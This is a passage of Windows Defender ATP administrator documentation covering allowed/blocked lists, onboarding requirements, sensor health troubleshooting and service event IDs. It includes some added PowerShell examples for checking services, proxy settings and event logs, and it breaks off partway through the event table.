investigations.
You can define the conditions for when entities are identified as malicious or safe based on certain attributes such
as hash values or certificates.

Create an allowed or blocked list


1. In the navigation pane, select Settings > Automation allowed/blocked list.
2. Select the tab of the type of entity you'd like to create an exclusion for. Currently, you can add a rule for
certificates.
3. Select Add allowed/blocked list rule.
4. For each attribute specify the exclusion type, details, and their corresponding required values.
5. Click Add rule.

Edit a list
1. In the navigation pane, select Settings > Automation allowed/blocked list.
2. Select the tab of the entity type you'd like to edit the list from.
3. Update the details of the rule and click Update rule.

Delete a list
1. In the navigation pane, select Settings > Automation allowed/blocked list.
2. Select the tab of the entity type you'd like to delete the list from.
3. Select the list type by clicking the check-box beside the list type.
4. Click Delete.

Related topics
Manage automation file uploads
Manage allowed/blocked lists
Manage automation folder exclusions
Manage indicators
4/22/2019

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

Create indicators that define the detection, prevention, and exclusion of entities. You can define the action to be
taken as well as the duration for when to apply the action as well as the scope of the machine group to apply it to.
On the top navigation you can:
Import a list
Add an indicator
Customize columns to add or remove columns
Export the entire list in CSV format
Select the items to show per page
Navigate between pages
Apply filters

Create an indicator
1. In the navigation pane, select Settings > Allowed/blocked list.
2. Select the tab of the type of entity you'd like to create an indicator for. You can choose any of the following
entities:
File hash
IP address
URLs/Domains
3. Click Add indicator.
4. For each attribute specify the following details:
Indicator - Specify the entity details and define the expiration of the indicator.
Action - Specify the action to be taken and provide a description.
Scope - Define the scope of the machine group.
5. Review the details in the Summary tab, then click Save.
NOTE
Blocking IPs, domains, or URLs is currently available on limited preview only. This requires sending your custom list to
network protection to be enforced, which is an option that will be generally available soon. As it is not yet generally available,
when an Automated investigation finds this indicator during an investigation it will use the allowed/blocked list as the basis of its
decision to automatically remediate (blocked list) or skip (allowed list) the entity.

Manage indicators
1. In the navigation pane, select Settings > Allowed/blocked list.
2. Select the tab of the entity type you'd like to manage.
3. Update the details of the indicator and click Save or click the Delete button if you'd like to remove the
entity from the list.

Import a list
You can also choose to upload a CSV file that defines the attributes of indicators, the action to be taken, and other
details.
Download the sample CSV to know the supported column attributes.

Related topics
Manage automation allowed/blocked lists
Manage automation file uploads
4/22/2019

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Enable the content analysis capability so that certain files and email attachments can automatically be uploaded to
the cloud for additional inspection in Automated investigation.
Identify the files and email attachments by specifying the file extension names and email attachment extension
names.
For example, if you add exe and bat as file or attachment extension names, then all files or attachments with those
extensions will automatically be sent to the cloud for additional inspection during Automated investigation.

Add file extension names and attachment extension names.


1. In the navigation pane, select Settings > Automation file uploads.
2. Toggle the content analysis setting between On and Off.
3. Configure the following extension names and separate extension names with a comma:
File extension names - Suspicious files except email attachments will be submitted for additional
inspection

Related topics
Manage automation allowed/blocked lists
Manage automation folder exclusions
Manage automation folder exclusions
4/22/2019

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)

Automation folder exclusions allow you to specify folders that the Automated investigation will skip.
You can control the following attributes about the folder that you'd like to be skipped:
Folders
Extensions of the files
File names
Folders
You can specify a folder and its subfolders to be skipped. You can use wild cards so that all files under the directory
are skipped by the automated investigation.
Extensions
You can specify the extensions to exclude in a specific directory. The extensions are a way to prevent an attacker
from using an excluded folder to hide an exploit. The extensions explicitly define which files to ignore.
File names
You can specify the file names that you want to be excluded in a specific directory. The names are a way to prevent
an attacker from using an excluded folder to hide an exploit. The names explicitly define which files to ignore.

Add an automation folder exclusion


1. In the navigation pane, select Settings > Automation folder exclusions.
2. Click New folder exclusion.
3. Enter the folder details:
Folder
Extensions
File names
Description
4. Click Save.

Edit an automation folder exclusion


1. In the navigation pane, select Settings > Automation folder exclusions.
2. Click Edit on the folder exclusion.
3. Update the details of the rule and click Save.

Remove an automation folder exclusion


1. In the navigation pane, select Settings > Automation folder exclusions.
2. Click Remove exclusion.

Related topics
Manage automation allowed/blocked lists
Manage automation file uploads

Onboard machines to the Windows Defender ATP service
4/22/2019

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You need to turn on the sensor to give visibility within Windows Defender ATP.
For more information, see Onboard your Windows 10 machines to Windows Defender ATP.

IMPORTANT
Some information relates to prereleased product which may be substantially modified before it's commercially released.
Microsoft makes no warranties, express or implied, with respect to the information provided here.

Licensing requirements
Windows Defender Advanced Threat Protection requires one of the following Microsoft Volume Licensing offers:
Windows 10 Enterprise E5
Windows 10 Education E5
Microsoft 365 Enterprise E5 which includes Windows 10 Enterprise E5
For more information, see Windows 10 Licensing.

Hardware and software requirements


Supported Windows versions
Windows 7 SP1 Enterprise
Windows 7 SP1 Pro
Windows 8.1 Enterprise
Windows 8.1 Pro
Windows 10, version 1607 or later
Windows 10 Enterprise
Windows 10 Education
Windows 10 Pro
Windows 10 Pro Education
Windows Server
Windows Server 2012 R2
Windows Server 2016
Windows Server, version 1803
Windows Server 2019
Machines on your network must be running one of these editions.
The hardware requirements for Windows Defender ATP on machines is the same as those for the supported
editions.

NOTE
Machines that are running mobile versions of Windows are not supported.

Other supported operating systems


macOS
Linux

NOTE
You'll need to know the exact Linux distros and macOS versions that are compatible with Windows Defender ATP for the
integration to work.

Network and data storage and configuration requirements


When you run the onboarding wizard for the first time, you must choose where your Windows Defender
Advanced Threat Protection-related information is stored: in the European Union, the United Kingdom, or the
United States datacenter.

NOTE
You cannot change your data storage location after the first-time setup.
Review the Windows Defender ATP data storage and privacy for more information on where and how Microsoft stores
your data.

Diagnostic data settings


You must ensure that the diagnostic data service is enabled on all the machines in your organization. By default,
this service is enabled, but it's good practice to check to ensure that you'll get sensor data from them.
Use the command line to check the Windows 10 diagnostic data service startup type:
1. Open an elevated command-line prompt on the machine:
a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter:

sc qc diagtrack

If the service is enabled, the output includes a START_TYPE line that reads 2 AUTO_START.
If START_TYPE is not set to AUTO_START, then you'll need to set the service to automatically start.
Use the command line to set the Windows 10 diagnostic data service to automatically start:
1. Open an elevated command-line prompt on the endpoint:
a. Go to Start and type cmd.
b. Right-click Command prompt and select Run as administrator.
2. Enter the following command, and press Enter (sc.exe requires the space between start= and its value):

sc config diagtrack start= auto

3. A success message is displayed. Verify the change by entering the following command, and press Enter:

sc qc diagtrack
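The following is an added PowerShell example, not code from the original page or from Microsoft. It performs the same check and fix as the sc qc / sc config steps above but returns an object per machine, so it can be run through remoting against a fleet and the non-compliant results collected. Setting the startup type requires an elevated session.

```powershell
# Added example (not from the original page): verify that the diagnostic data
# service (DiagTrack) starts automatically and is running, and fix it if not.
# Equivalent to the sc qc / sc config steps above, but returns an object that
# can be gathered from many machines. Run elevated to change the service.
function Test-WdatpDiagTrack {
    $svc = Get-Service -Name 'diagtrack' -ErrorAction Stop
    [pscustomobject]@{
        Computer  = $env:COMPUTERNAME
        StartType = $svc.StartType
        Status    = $svc.Status
        Compliant = ($svc.StartType -eq 'Automatic' -and $svc.Status -eq 'Running')
    }
}

function Repair-WdatpDiagTrack {
    $state = Test-WdatpDiagTrack
    if ($state.Compliant) { return $state }
    if ($state.StartType -ne 'Automatic') {
        # Same effect as: sc config diagtrack start= auto
        Set-Service -Name 'diagtrack' -StartupType Automatic
    }
    if ($state.Status -ne 'Running') {
        Start-Service -Name 'diagtrack'
    }
    # Re-read the service so the returned object reflects the actual state.
    Test-WdatpDiagTrack
}

Repair-WdatpDiagTrack | Format-List
```

If a policy sets the service to Disabled, the change made here is undone at the next policy refresh; in that case the policy is what needs fixing, not the local service entry.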

Internet connectivity
Internet connectivity on machines is required either directly or through proxy.
The Windows Defender ATP sensor can utilize a daily average bandwidth of 5MB to communicate with the
Windows Defender ATP cloud service and report cyber data. One-off activities such as file uploads and
investigation package collection are not included in this daily average bandwidth.
For more information on additional proxy configuration settings, see Configure machine proxy and Internet
connectivity settings.
Before you onboard machines, the diagnostic data service must be enabled. The service is enabled by default in
Windows 10.

Windows Defender Antivirus configuration requirement


The Windows Defender ATP agent depends on the ability of Windows Defender Antivirus to scan files and
provide information about them.
You must configure Security intelligence updates on the Windows Defender ATP machines whether Windows
Defender Antivirus is the active antimalware or not. For more information, see Manage Windows Defender
Antivirus updates and apply baselines.
When Windows Defender Antivirus is not the active antimalware in your organization and you use the Windows
Defender ATP service, Windows Defender Antivirus goes into passive mode. If your organization has disabled
Windows Defender Antivirus through group policy or other methods, machines that are onboarded to Windows
Defender ATP must be excluded from this group policy.
If you are onboarding servers and Windows Defender Antivirus is not the active antimalware on your servers,
you shouldn't uninstall Windows Defender Antivirus. You'll need to configure it to run in passive mode. For
more information, see Onboard servers.
For more information, see Windows Defender Antivirus compatibility.

Windows Defender Antivirus Early Launch Antimalware (ELAM) driver is enabled

If you're running Windows Defender Antivirus as the primary antimalware product on your machines, the
Windows Defender ATP agent will successfully onboard.
If you're running a third-party antimalware client and use Mobile Device Management solutions or System
Center Configuration Manager (current branch) version 1606, you'll need to ensure that the Windows Defender
Antivirus ELAM driver is enabled. For more information, see Ensure that Windows Defender Antivirus is not
disabled by policy.

In this section

TOPIC | DESCRIPTION
Onboard previous versions of Windows | Onboard Windows 7 and Windows 8.1 machines to Windows Defender ATP.
Onboard Windows 10 machines | You'll need to onboard machines for them to report to the Windows Defender ATP service. Learn about the tools and methods you can use to configure machines in your enterprise.
Onboard servers | Onboard Windows Server 2012 R2 and Windows Server 2016 to Windows Defender ATP.
Onboard non-Windows machines | Windows Defender ATP provides a centralized security operations experience for Windows as well as non-Windows platforms. You'll be able to see alerts from various supported operating systems (OS) in Windows Defender Security Center and better protect your organization's network. This experience leverages third-party security products' sensor data.
Run a detection test on a newly onboarded machine | Run a script on a newly onboarded machine to verify that it is properly reporting to the Windows Defender ATP service.
Configure proxy and Internet settings | Enable communication with the Windows Defender ATP cloud service by configuring the proxy and Internet connectivity settings.
Troubleshoot onboarding issues | Learn about resolving issues that might arise during onboarding.

Want to experience Windows Defender ATP? Sign up for a free trial.


Offboard machines from the Windows Defender ATP service
4/22/2019 • 2 minutes to read

Applies to:
macOS
Linux
Windows Server 2012 R2
Windows Server 2016
Windows Defender Advanced Threat Protection (Windows Defender ATP)


Follow the corresponding instructions depending on your preferred deployment method.

Offboard Windows 10 machines
Offboard machines using a local script
Offboard machines using Group Policy
Offboard machines using System Center Configuration Manager
Offboard machines using Mobile Device Management tools

Offboard servers
Offboard servers

Offboard non-Windows machines
Offboard non-Windows machines

Windows Defender Security Center time zone settings
4/22/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


Use the Time zone menu to configure the time zone and view license information.

Time zone settings


The aspect of time is important in the assessment and analysis of perceived and actual cyberattacks.
Cyberforensic investigations often rely on time stamps to piece together the sequence of events. It’s important that
your system reflects the correct time zone settings.
Windows Defender ATP can display either Coordinated Universal Time (UTC) or local time.
Your current time zone setting is shown in the Windows Defender ATP menu. You can change the displayed time
zone in the Time zone menu.
UTC time zone
Windows Defender ATP uses UTC time by default.
Setting the Windows Defender ATP time zone to UTC will display all system timestamps (alerts, events, and others)
in UTC for all users. This can help security analysts working in different locations across the globe to use the same
time stamps while investigating events.
Local time zone
You can choose to have Windows Defender ATP use local time zone settings. All alerts and events will be displayed
using your local time zone.
The local time zone is taken from your machine’s regional settings. If you change your regional settings, the
Windows Defender ATP time zone will also change. Choosing this setting means that the timestamps displayed in
Windows Defender ATP will be aligned to local time for all Windows Defender ATP users. Analysts located in
different global locations will now see the Windows Defender ATP alerts according to their regional settings.
Choosing to use local time can be useful if the analysts are located in a single location. In this case it might be
easier to correlate events to local time, for example – when a local user clicked on a suspicious email link.
Set the time zone
The Windows Defender ATP time zone is set by default to UTC. Setting the time zone also changes the times for all
Windows Defender ATP views. To set the time zone:

1. Click the Time zone menu.
2. Select the Timezone UTC indicator.
3. Select Timezone UTC or your local time zone, for example -7:00.
Regional settings
To apply different date formats for Windows Defender ATP, use regional settings for Internet Explorer (IE) and
Microsoft Edge (Edge). If you're using another browser such as Google Chrome, follow the required steps to
change the time and date settings for that browser.
Internet Explorer (IE) and Microsoft Edge
IE and Microsoft Edge use the Region settings configured in the Clocks, Language, and Region option in the
Control panel.
Known issues with regional formats
Date and time formats
There are some known issues with the time and date formats.
The following date formats are supported:
MM/dd/yyyy
dd/MM/yyyy
The following date and time formats are currently not supported:
Date format yyyy-MM-dd
Date format dd-MMM-yy
Date format dd/MM/yy
Date format MM/dd/yy
Date format with yy. Will only show yyyy.
Time format HH:mm:ss is not supported (the 12 hour AM/PM format is not supported). Only the 24-hour
format is supported.
Decimal symbol used in numbers
Decimal symbol used is always a dot, even if a comma is selected in the Numbers format settings in Region
settings. For example, 15,5K is displayed as 15.5K.
Troubleshoot Windows Defender Advanced Threat Protection
4/22/2019 • 2 minutes to read

Troubleshoot issues that might arise as you use Windows Defender ATP capabilities.

In this section

TOPIC | DESCRIPTION
Troubleshoot sensor state | Find solutions for issues related to the Windows Defender ATP sensor.
Troubleshoot service issues | Fix issues related to the Windows Defender Advanced Threat Protection service.
Troubleshoot attack surface reduction | Fix issues related to network protection and attack surface reduction rules.
Troubleshoot next generation protection | If you encounter a problem with antivirus, you can search the tables in this topic to find a matching issue and potential solution.

Check sensor health state in Windows Defender ATP
4/5/2019 • 2 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


The sensor health tile provides information on the individual machine’s ability to provide sensor data and
communicate with the Windows Defender ATP service. It reports how many machines require attention and helps
you identify problematic machines and take action to correct known issues.
There are two status indicators on the tile that provide information on the number of machines that are not
reporting properly to the service:
Misconfigured - These machines might partially be reporting sensor data to the Windows Defender ATP
service and might have configuration errors that need to be corrected.
Inactive - Machines that have stopped reporting to the Windows Defender ATP service for more than seven
days in the past month.
Clicking any of the groups directs you to Machines list, filtered according to your choice.
You can also download the entire list in CSV format using the Export to CSV feature. For more information on
filters, see View and organize the Machines list.
You can filter the health state list by the following status:
Active - Machines that are actively reporting to the Windows Defender ATP service.
Misconfigured - These machines might partially be reporting sensor data to the Windows Defender ATP
service but have configuration errors that need to be corrected. Misconfigured machines can have either one or
a combination of the following issues:
No sensor data - The machine has stopped sending sensor data. Only limited alerts can be triggered from the
machine.
Impaired communications - Ability to communicate with machine is impaired. Sending files for deep
analysis, blocking files, isolating machine from network and other actions that require communication
with the machine may not work.
Inactive - Machines that have stopped reporting to the Windows Defender ATP service.
You can view the machine details when you click on a misconfigured or inactive machine. You’ll see more specific
machine information when you click the information icon.
In the Machines list, you can download a full list of all the machines in your organization in a CSV format.

NOTE
Export the list in CSV format to display the unfiltered data. The CSV file will include all machines in the organization,
regardless of any filtering applied in the view itself and can take a significant amount of time to download, depending on
how large your organization is.

Related topic
Fix unhealthy sensors in Windows Defender ATP
Fix unhealthy sensors in Windows Defender ATP
4/18/2019 • 3 minutes to read

Applies to:
Windows Defender Advanced Threat Protection (Windows Defender ATP)


Machines that are categorized as misconfigured or inactive can be flagged due to varying causes. This section
provides some explanations as to what might have caused a machine to be categorized as inactive or
misconfigured.

Inactive machines
An inactive machine is not necessarily flagged due to an issue. The following actions taken on a machine can cause
a machine to be categorized as inactive:
Machine is not in use
If the machine has not been in use for more than 7 days for any reason, it will remain in an ‘Inactive’ status in the
portal.
Machine was reinstalled or renamed
A reinstalled or renamed machine will generate a new machine entity in Windows Defender Security Center. The
previous machine entity will remain with an ‘Inactive’ status in the portal. If you reinstalled a machine and deployed
the Windows Defender ATP package, search for the new machine name to verify that the machine is reporting
normally.
Machine was offboarded
If the machine was offboarded it will still appear in machines list. After 7 days, the machine health state should
change to inactive.
Machine is not sending signals
If the machine is not sending any signals for more than 7 days to any of the Windows Defender ATP channels for
any reason, including conditions that fall under the misconfigured machines classification, the machine can be
considered inactive.
Do you expect a machine to be in ‘Active’ status? Open a support ticket.

Misconfigured machines
Misconfigured machines can further be classified as:
Impaired communications
No sensor data
Impaired communications
This status indicates that there's limited communication between the machine and the service.
The following suggested actions can help fix issues related to a misconfigured machine with impaired
communications:
Ensure the machine has an Internet connection
The Windows Defender ATP sensor requires Microsoft Windows HTTP (WinHTTP) to report sensor data and
communicate with the Windows Defender ATP service.
Verify client connectivity to Windows Defender ATP service URLs
Verify the proxy configuration completed successfully, that WinHTTP can discover and communicate
through the proxy server in your environment, and that the proxy server allows traffic to the Windows
Defender ATP service URLs.
If you took corrective actions and the machine status is still misconfigured, open a support ticket.
No sensor data
A misconfigured machine with status ‘No sensor data’ has communication with the service but can only report
partial sensor data. Follow these actions to correct known issues related to a misconfigured machine with status
‘No sensor data’:
Ensure the machine has an Internet connection
The Windows Defender ATP sensor requires Microsoft Windows HTTP (WinHTTP) to report sensor data and
communicate with the Windows Defender ATP service.
Verify client connectivity to Windows Defender ATP service URLs
Verify the proxy configuration completed successfully, that WinHTTP can discover and communicate
through the proxy server in your environment, and that the proxy server allows traffic to the Windows
Defender ATP service URLs.
Ensure the diagnostic data service is enabled
If the machines aren't reporting correctly, you might need to check that the Windows 10 diagnostic data
service is set to automatically start and is running on the endpoint.
Ensure that Windows Defender Antivirus is not disabled by policy
If your machines are running a third-party antimalware client, the Windows Defender ATP agent needs the
Windows Defender Antivirus Early Launch Antimalware (ELAM) driver to be enabled.
If you took corrective actions and the machine status is still misconfigured, open a support ticket.
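The checks listed above for both misconfigured states (sensor and diagnostic data services, WinHTTP proxy discovery, and reachability of the service endpoints) can be gathered in one report before opening a support ticket. This is an added example and not part of the original documentation. It assumes the sensor's Windows service short name is Sense and the diagnostic data service is DiagTrack; the list of service URLs is a placeholder to be filled from the Configure machine proxy and Internet connectivity settings topic, since this page does not list them.

```powershell
# Added example (not part of the original documentation): one-shot report for a
# machine flagged "Impaired communications" or "No sensor data". Run elevated.
#
# PLACEHOLDER: replace with the Windows Defender ATP service URLs (host names,
# optionally host:port) from the proxy and Internet connectivity topic.
$ServiceUrls = @(
    'PLACEHOLDER-atp-service-url.example'
)

function Get-SensorConnectivityReport {
    param([string[]]$Urls = $ServiceUrls)

    $report = [ordered]@{}

    # 1. Sensor service (assumed short name "Sense") and diagnostic data service.
    #    Both must be running; DiagTrack should be set to start automatically.
    foreach ($name in 'Sense', 'DiagTrack') {
        $svc = Get-Service -Name $name -ErrorAction SilentlyContinue
        $report[$name] = if ($svc) { "$($svc.Status) ($($svc.StartType))" } else { 'not installed' }
    }

    # 2. WinHTTP proxy. The sensor uses WinHTTP, so this setting is the one that
    #    matters, not the per-user Internet Explorer proxy.
    $winhttp = (netsh.exe winhttp show proxy) -join ' '
    $report['WinHttpProxy'] = ($winhttp -replace '\s+', ' ').Trim()
    $proxyHost = $null
    if ($winhttp -match 'Proxy Server\(s\)\s*:\s*([^\s;]+)') {
        # First configured proxy as host:port; the endpoint must be able to reach it
        $proxyHost = $Matches[1]
    }

    # 3. TCP/443 reachability. With a proxy configured the machine only needs to
    #    reach the proxy; without one it must reach the service URLs directly.
    $targets = if ($proxyHost) { ,$proxyHost } else { $Urls }
    foreach ($t in $targets) {
        $hostName, $port = $t -split ':'
        if (-not $port) { $port = 443 }
        $ok = Test-NetConnection -ComputerName $hostName -Port ([int]$port) `
                                 -InformationLevel Quiet -WarningAction SilentlyContinue
        $report["TCP $hostName`:$port"] = if ($ok) { 'reachable' } else { 'BLOCKED' }
    }

    [pscustomobject]$report
}

Get-SensorConnectivityReport | Format-List
```

A TCP connect to the proxy only proves the proxy is reachable; whether the proxy allows the service URLs is the proxy administrator's policy to confirm, which is the third item in the checklist above. If Sense reports "not installed", the machine was never onboarded and the onboarding steps, not this checklist, apply.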

Related topic
Check sensor health state in Windows Defender ATP
Review events and errors using Event Viewer
4/5/2019 • 10 minutes to read

Applies to:
Event Viewer
Windows Defender Advanced Threat Protection (Windows Defender ATP)
You can review event IDs in the Event Viewer on individual machines.
For example, if machines are not appearing in the Machines list, you might need to look for event IDs on the
machines. You can then use this table to determine further troubleshooting steps.

NOTE
It can take several days for machines to begin reporting to the Windows Defender ATP service.

Open Event Viewer and find the Windows Defender ATP service event log:
1. Click Start on the Windows menu, type Event Viewer, and press Enter.
2. In the log list, under Log Summary, scroll until you see Microsoft-Windows-SENSE/Operational.
Double-click the item to open the log.
a. You can also access the log by expanding Applications and Services Logs > Microsoft > Windows >
SENSE and clicking Operational.

NOTE
SENSE is the internal name used to refer to the behavioral sensor that powers Windows Defender ATP.

3. Events recorded by the service will appear in the log. See the following table for a list of events recorded by
the service.
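The same log can be read without opening Event Viewer, which is useful when many machines are missing from the Machines list. The following is an added example, not code from the original documentation: it reads the Microsoft-Windows-SENSE/Operational log with Get-WinEvent and sorts events into the action groups used by the table that follows (informational, connectivity, onboarding, diagnostic data service). The grouping of event IDs is taken from that table; any ID not in a group is marked SeeTable.

```powershell
# Added example (not part of the original documentation): summarize recent
# Windows Defender ATP sensor events and flag those that need action.
# The ID groups below follow the "Action" column of the event table.

$InformationalIds = 1, 2, 4, 11, 12, 13, 18, 19, 36, 37  # no action (12 and 19 clear on their own)
$ConnectivityIds  = 5, 15                                 # check proxy / Internet connectivity
$OnboardingIds    = 6, 7, 9, 10, 25, 26, 27, 30           # redeploy the onboarding package
$TelemetryIds     = 17, 28, 31, 34, 35                    # Connected User Experiences and Telemetry service

function Get-SenseEventSummary {
    param(
        [string]$ComputerName = $env:COMPUTERNAME,
        [int]$MaxEvents = 200
    )

    $params = @{ LogName = 'Microsoft-Windows-SENSE/Operational'; MaxEvents = $MaxEvents }
    if ($ComputerName -ne $env:COMPUTERNAME) { $params['ComputerName'] = $ComputerName }

    # Get-WinEvent throws when the log is missing or empty, which on an endpoint
    # usually means the sensor was never onboarded or has not started.
    try {
        $events = Get-WinEvent @params -ErrorAction Stop
    } catch {
        Write-Warning "Could not read the SENSE log on $ComputerName : $($_.Exception.Message)"
        return $null
    }

    foreach ($e in $events) {
        $category = switch ($e.Id) {
            { $_ -in $ConnectivityIds }  { 'Connectivity'; break }
            { $_ -in $OnboardingIds }    { 'Onboarding'; break }
            { $_ -in $TelemetryIds }     { 'DiagnosticData'; break }
            { $_ -in $InformationalIds } { 'Informational'; break }
            default                      { 'SeeTable' }
        }
        [pscustomobject]@{
            ComputerName = $ComputerName
            TimeCreated  = $e.TimeCreated
            Id           = $e.Id
            Category     = $category
            Message      = ($e.Message -split "`n")[0]   # first line only
        }
    }
}

# Most recent actionable events first
Get-SenseEventSummary |
    Where-Object Category -ne 'Informational' |
    Sort-Object TimeCreated -Descending |
    Format-Table -AutoSize
```

To run this across several machines, call Get-SenseEventSummary -ComputerName for each name; remote reads use the Event Log RPC channel, which must be allowed by the host firewall.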

For each event: Event ID, Message, Description, Action.

Event ID 1
Message: Windows Defender Advanced Threat Protection service started (Version variable).
Description: Occurs during system start up, shut down, and during onboarding.
Action: Normal operating notification; no action required.

Event ID 2
Message: Windows Defender Advanced Threat Protection service shutdown.
Description: Occurs when the machine is shut down or offboarded.
Action: Normal operating notification; no action required.

Event ID 3
Message: Windows Defender Advanced Threat Protection service failed to start. Failure code: variable.
Description: Service did not start.
Action: Review other messages to determine possible cause and troubleshooting steps.

Event ID 4
Message: Windows Defender Advanced Threat Protection service contacted the server at variable.
Description: Variable = URL of the Windows Defender ATP processing servers. This URL will match that seen in the Firewall or network activity.
Action: Normal operating notification; no action required.

Event ID 5
Message: Windows Defender Advanced Threat Protection service failed to connect to the server at variable.
Description: Variable = URL of the Windows Defender ATP processing servers. The service could not contact the external processing servers at that URL.
Action: Check the connection to the URL. See Configure proxy and Internet connectivity.

Event ID 6
Message: Windows Defender Advanced Threat Protection service is not onboarded and no onboarding parameters were found.
Description: The machine did not onboard correctly and will not be reporting to the portal.
Action: Onboarding must be run before starting the service. Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows 10 machines.

Event ID 7
Message: Windows Defender Advanced Threat Protection service failed to read the onboarding parameters. Failure: variable.
Description: Variable = detailed error description. The machine did not onboard correctly and will not be reporting to the portal.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows 10 machines.

Event ID 8
Message: Windows Defender Advanced Threat Protection service failed to clean its configuration. Failure code: variable.
Description: During onboarding: The service failed to clean its configuration during the onboarding. The onboarding process continues. During offboarding: The service failed to clean its configuration during the offboarding. The offboarding process finished but the service keeps running.
Action: Onboarding: No action required. Offboarding: Reboot the system. See Onboard Windows 10 machines.

Event ID 9
Message: Windows Defender Advanced Threat Protection service failed to change its start type. Failure code: variable.
Description: During onboarding: The machine did not onboard correctly and will not be reporting to the portal. During offboarding: Failed to change the service start type. The offboarding process continues.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows 10 machines.

Event ID 10
Message: Windows Defender Advanced Threat Protection service failed to persist the onboarding information. Failure code: variable.
Description: The machine did not onboard correctly and will not be reporting to the portal.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows 10 machines.

Event ID 11
Message: Onboarding or re-onboarding of Windows Defender Advanced Threat Protection service completed.
Description: The machine onboarded correctly. It may take several hours for the machine to appear in the portal.
Action: Normal operating notification; no action required.

Event ID 12
Message: Windows Defender Advanced Threat Protection failed to apply the default configuration.
Description: Service was unable to apply the default configuration.
Action: This error should resolve after a short period of time.

Event ID 13
Message: Windows Defender Advanced Threat Protection machine ID calculated: variable.
Description: Normal operating process.
Action: Normal operating notification; no action required.

Event ID 15
Message: Windows Defender Advanced Threat Protection cannot start command channel with URL: variable.
Description: Variable = URL of the Windows Defender ATP processing servers. The service could not contact the external processing servers at that URL.
Action: Check the connection to the URL. See Configure proxy and Internet connectivity.

Event ID 17
Message: Windows Defender Advanced Threat Protection service failed to change the Connected User Experiences and Telemetry service location. Failure code: variable.
Description: An error occurred with the Windows telemetry service.
Action: Ensure the diagnostic data service is enabled. Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows 10 machines.

Event ID 18
Message: OOBE (Windows Welcome) is completed.
Description: Service will only start after any Windows updates have finished installing.
Action: Normal operating notification; no action required.

Event ID 19
Message: OOBE (Windows Welcome) has not yet completed.
Description: Service will only start after any Windows updates have finished installing.
Action: Normal operating notification; no action required. If this error persists after a system restart, ensure all Windows updates have fully installed.

Event ID 20
Message: Cannot wait for OOBE (Windows Welcome) to complete. Failure code: variable.
Description: Internal error.
Action: If this error persists after a system restart, ensure all Windows updates have fully installed.

Event ID 25
Message: Windows Defender Advanced Threat Protection service failed to reset health status in the registry. Failure code: variable.
Description: The machine did not onboard correctly. It will report to the portal, however the service may not appear as registered in SCCM or the registry.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows 10 machines.

Event ID 26
Message: Windows Defender Advanced Threat Protection service failed to set the onboarding status in the registry. Failure code: variable.
Description: The machine did not onboard correctly. It will report to the portal, however the service may not appear as registered in SCCM or the registry.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows 10 machines.

Event ID 27
Message: Windows Defender Advanced Threat Protection service failed to enable SENSE aware mode in Windows Defender Antivirus. Onboarding process failed. Failure code: variable.
Description: Normally, Windows Defender Antivirus will enter a special passive state if another real-time antimalware product is running properly on the machine, and the machine is reporting to Windows Defender ATP.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows 10 machines. Ensure real-time antimalware protection is running properly.

Event ID 28
Message: Windows Defender Advanced Threat Protection Connected User Experiences and Telemetry service registration failed. Failure code: variable.
Description: An error occurred with the Windows telemetry service.
Action: Ensure the diagnostic data service is enabled. Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows 10 machines.

Event ID 29
Message: Failed to read the offboarding parameters. Error type: %1, Error code: %2, Description: %3
Description: This event occurs when the system can't read the offboarding parameters.
Action: Ensure the machine has Internet access, then run the entire offboarding process again.

Event ID 30
Message: Windows Defender Advanced Threat Protection service failed to disable SENSE aware mode in Windows Defender Antivirus. Failure code: variable.
Description: Normally, Windows Defender Antivirus will enter a special passive state if another real-time antimalware product is running properly on the machine, and the machine is reporting to Windows Defender ATP.
Action: Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows 10 machines. Ensure real-time antimalware protection is running properly.

Event ID 31
Message: Windows Defender Advanced Threat Protection Connected User Experiences and Telemetry service unregistration failed. Failure code: variable.
Description: An error occurred with the Windows telemetry service during onboarding. The offboarding process continues.
Action: Check for errors with the Windows telemetry service.

Event ID 32
Message: Windows Defender Advanced Threat Protection service failed to request to stop itself after offboarding process. Failure code: %1
Description: An error occurred during offboarding.
Action: Reboot the machine.

Event ID 33
Message: Windows Defender Advanced Threat Protection service failed to persist SENSE GUID. Failure code: variable.
Description: A unique identifier is used to represent each machine that is reporting to the portal. If the identifier does not persist, the same machine might appear twice in the portal.
Action: Check registry permissions on the machine to ensure the service can update the registry.

Event ID 34
Message: Windows Defender Advanced Threat Protection service failed to add itself as a dependency on the Connected User Experiences and Telemetry service, causing onboarding process to fail. Failure code: variable.
Description: An error occurred with the Windows telemetry service.
Action: Ensure the diagnostic data service is enabled. Check that the onboarding settings and scripts were deployed properly. Try to redeploy the configuration packages. See Onboard Windows 10 machines.

Event ID 35
Message: Windows Defender Advanced Threat Protection service failed to remove itself as a dependency on the Connected User Experiences and Telemetry service. Failure code: variable.
Description: An error occurred with the Windows telemetry service during offboarding. The offboarding process continues.
Action: Check for errors with the Windows diagnostic data service.

Event ID 36
Message: Windows Defender Advanced Threat Protection Connected User Experiences and Telemetry service registration succeeded. Completion code: variable.
Description: Registering Windows Defender Advanced Threat Protection with the Connected User Experiences and Telemetry service completed successfully.
Action: Normal operating notification; no action required.

Event ID 37
